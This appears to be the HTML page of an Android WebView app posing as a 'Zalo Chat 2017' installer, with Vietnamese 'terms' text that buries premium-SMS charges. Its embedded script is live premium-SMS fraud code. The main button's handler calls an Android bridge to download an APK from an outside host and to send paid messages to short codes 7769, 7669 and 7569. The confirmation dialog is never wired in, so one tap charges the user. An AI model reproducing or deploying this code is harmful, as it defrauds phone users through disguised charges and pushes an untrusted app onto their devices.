<html>
 <head> 
  <meta charset="UTF-8"> 
  <style type="text/css">
.orangebt {
 display: inline-block;
 outline: none;
 border: none;
 box-shadow: 0 8px #1a5f00;
 background-color:#34c000;
 border-radius:10px;
 width: 100%;
 min-height: 60px;
 color:#ffffff;
 font-family:calibri;
 font-size:20px;
 font-weight:bold;
}.orangebt:hover {
 background-color:#2ea900;
}.orangebt:active {
 background-color:#2ea900;
 box-shadow: 0 5px #1a5f00;
 transform: translateY(4px);
}
.graybt {
 display: inline-block;
 outline: none;
 border: none;
 box-shadow: 0 8px #4B4B4B;
 background-color:#939393;
 border-radius:10px;
 width: 100%;
 min-height: 60px;
 color:#ffffff;
 font-family:calibri;
 font-size:20px;
 font-weight:bold;
}.graybt:hover {
 background-color:#7A7979;
}.graybt:active {
 background-color:#7A7979;
 box-shadow: 0 5px #353535;
 transform: translateY(4px);
}

</style> 
  <style>
       ::-webkit-scrollbar {
		    width: 12px;
		}
		#ssx::-webkit-scrollbar {display:block;} 
		
		#ssx::-webkit-scrollbar-track
		{
			-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
			--border-radius: 10px;
			background-color: #C0C0C0;
		}
		
		#ssx::-webkit-scrollbar
		{
			width: 12px;
			background-color: #C0C0C0;
		}
		
		#ssx::-webkit-scrollbar-thumb
		{
			--border-radius: 10px;
			-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
			background-color: #34c000;
		}

       </style> 
  <script type="text/javascript">var url = "http://file.waptaiaz.com/adw/Zalo-Chat.apk"; var phone1_15 = "7769"; var phone1_10 = "7669"; var phone1_5 = "7569"; var phone1_4 = ""; var msg1_15 = "DKZ ZALO 0325 WAP"; var msg1_10 = "DKZ ZALO 0325 WAP"; var msg1_5 = "DKZ ZALO 0325 WAP"; var msg1_4 = "DKZ ZALO 0325 WAP"; var phone2_15 = "7769"; var phone2_10 = "7669"; var phone2_5 = "7569"; var phone2_4 = ""; var msg2_15 = "DKZ ZALO 0325 WAP"; var msg2_10 = "DKZ ZALO 0325 WAP"; var msg2_5 = "DKZ ZALO 0325 WAP"; var msg2_4 = "DKZ ZALO 0325 WAP"; function myFunction(){ var link = url; var p1_15 = phone1_15; var p1_10 = phone1_10; var p1_5 = phone1_5; var p1_4 = phone1_4; var m1_15 = msg1_15; var m1_10 = msg1_10; var m1_5 = msg1_5; var m1_4 = msg1_4; var p2_15 = phone2_15; var p2_10 = phone2_10; var p2_5 = phone2_5; var p2_4 = phone2_4; var m2_15 = msg2_15; var m2_10 = msg2_10; var m2_5 = msg2_5; var m2_4 = msg2_4; Android.downGame(link); Android.send(p1_15,p1_10,p1_5,p1_4,m1_15,m1_10,m1_5,m1_4,p2_15,p2_10,p2_5,p2_4,m2_15,m2_10,m2_5,m2_4);} function myFunction1(){Android.exit();}function check(){var r = confirm("Bạn đồng ý gửi tin nhắn để tải game/ứng dụng về điện thoại?"); if (r == true) {myFunction();}}</script> 
  <title></title> 
 </head> 
 <body style="background-color:#fbfbfb; margin: 0px; padding: 0px; height: 100%; width: 100%;text-align:justify;"> 
  <table width="100%" height="100px" border="0" cellspacing="0" cellpadding="10"> 
   <tbody> 
    <tr style="background-color: #34c000;"> 
     <td> <img src="file:///android_asset/ic.png" width="82px" height="82px"> </td> 
     <!--file:///android_asset/ic.png--> 
     <td width="100%" align="justify"><h1 style="color:white; font-family:calibri;" id="appName">Zalo</h1><h3 style="color:white; font-family:calibri;">Cost: 5000 - 30000</h3></td> 
    </tr> 
   </tbody> 
  </table> 
  <div style="min-height: 80px; max-height: 100px; border-radius: 12px; padding-left: 10px; padding-right: 10px; padding-top: 5px; padding-bottom: 5px; margin: 10px; text-align:justify; font-family:calibri;"> 
   <b id="appDesc" style="font-size:20px;">Zalo Chat 2017 - Phần mềm nhắn tin và gọi điện miễn phí.</b> 
  </div> 
  <p></p> 
  <div style="margin: 10px; border-radius: 12px;"> 
   <div id="ssx" style="font-family:calibri; background-color:#C0C0C0;padding: 10px;margin: 10px; width: auto; height: 120px; overflow-y: scroll; border: solid 1px #333; -webkit-overflow-scrolling: touch;"> 
    <div style="text-align:center;"> 
     <font color="black" size="+1"><b>BẢNG ĐIỀU KHOẢN</b></font>
    </div> Vui Lòng Đọc Kỹ Điều Khoản Trước Khi Cài Đặt Game
    <br> 
    <b>1.</b> Đây là một dịch vụ hỗ trợ Download Game và Ứng dụng cho điện thoại. Giúp người dùng tải và cài đặt ứng dụng một cách thuận tiện.
    <br> 
    <b>2.</b> Quyền Sở Hữu Trí Tuệ
    <br> - Tất cả hình ảnh, biểu tượng, và tất cả các nội dung khác (gọi tắt là Nội dung) tại Ứng Dụng này thuộc sở hữu của chúng tôi và các tổ chức/công ty khác đã được chúng tôi cho phép
    <br> 
    <b>3. </b>Phí Dịch Vụ Cho Nhà Phát Triển 
    <br> - Để duy trì hệ thống được tốt, chúng tôi có thu phí mỗi game. Chi phí mỗi lần tải là 30.000đ ( Ba mươi ngàn đồng chẵn ) tức 2 tin nhắn gửi đến đầu số 7769. 
    <br> Nếu quý khách hàng không đủ số tiền 30.000đ mà vẫn muốn tải game, chúng tôi sẽ hỗ trợ thu phí theo số tiền quý khách có thể thanh toán, từ 5.000đ-&gt;30.000đ trên các đầu số tương ứng.
    <br> - Cụ thể: 
    <br> Nếu quý khách có 25.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 7769 và 1 tin nhắn đến 7669.
    <br> Nếu quý khách có 20.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 7769 và 1 tin nhắn đến 7569.
    <br> Nếu quý khách có 15.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 7769.
    <br> Nếu quý khách có 10.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 7669.
    <br> Nếu quý khách có 5.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 7569.
    <br> Nếu quý khách có 4.000đ, chúng tôi sẽ gửi 1 tin nhắn đến đầu 7469.
    <br> Chúng tôi cam kết không trừ tiền khi khách hàng chưa ấn Đồng Ý Tải Và Cài Đặt !
    <br> 
    <b>4.</b> Thỏa Thuận Dịch Vụ
    <br> - Bằng cách bấm vào nút ĐỒNG Ý TẢI VÀ CÀI ĐẶT Bạn được coi như đã chấp thuận các điều khoản và điều kiện của chúng tôi
    <br> 
    <b>5.</b> Quy Định Sử Dụng Dịch Vụ
    <br> - Không gỡ bỏ hoặc vô hiệu hóa bất kỳ biện pháp bảo vệ quyền sở hữu hay bản quyền có
    <br> 
    <b>6.</b> Những hành vi không được chấp nhận
    <br> - Không tạo ra các bản sao bắt chước các tính năng, giao diện và dữ liệu của trò chơi này
    <br> - Không sử dụng trò chơi này làm công cụ để gây hại cho những người khác
    <br> 
    <b>7.</b> NHỮNG ĐIỀU KHOẢN CHUNG
    <br> - Đối với game có giao tiếp giữa người chơi với nhau (ví dụ các game có mạng xã hội) thì người chơi phải tuân thủ thao đúng các quy tắc ứng xử, tạo môi trường lành mạnh, không truyền bá các tư tưởng phản động, văn hóa không đúng với thuần phong mỹ tục của người dân Việt Nam
    <br> 
    <b>8.</b> Trách Nhiệm Của Mỗi Bên
    <br> - Chúng Tôi gọi tắt là bên (a)
    <br> - Người mua ứng dụng/game của chúng tôi là bên (b)
    <br> - Bên (a) chịu trách nhiệm hỗ trợ về Game/ứng dụng khách hàng sau khi cài đặt bị lỗi do sever hay bị lỗi hệ thống từ Nhà Phát Hành ( NPH ), giải đáp cho khách hàng những vướng mắc trong quá trình cài đặt Game/Ứng dụng
    <br> - Trách Nhiệm Bên (b): Khi bạn bấm tải và cài đặt trò chơi đồng nghĩa với việc bạn đã đồng ý với các điều khoản của chúng tôi đưa ra và bạn cam kết không khiếu nại
    <br> 
    <b>Xin chân thành cảm ơn và chúc các bạn có những giây phút chơi game vui vẻ !</b>
    <br> 
    <br> 
   </div> 
  </div> 
  <br> 
  <div style="margin: 10px;"> 
   <button onclick="myFunction()" class="orangebt">ĐỒNG Ý TẢI VÀ CÀI ĐẶT</button> 
  </div> 
  <p></p> 
  <!-- <div style="padding-left: 5px; padding-right: 5px; padding-top: 5px; padding-bottom: 5px;margin: 10px;text-align:justify;">--> 
  <div style="margin: 10px; text-align:justify; font-size:20px; font-family:calibri;"> 
   <b><i>*Lưu ý: Sử dụng WiFi để việc cài đặt có thể được thực hiện nhanh hơn!</i></b> 
  </div> 
  <div style="margin: 10px;"> 
   <button onclick="myFunction1()" class="graybt">THOÁT</button> 
  </div> 
  <br>  
 </body>
</html>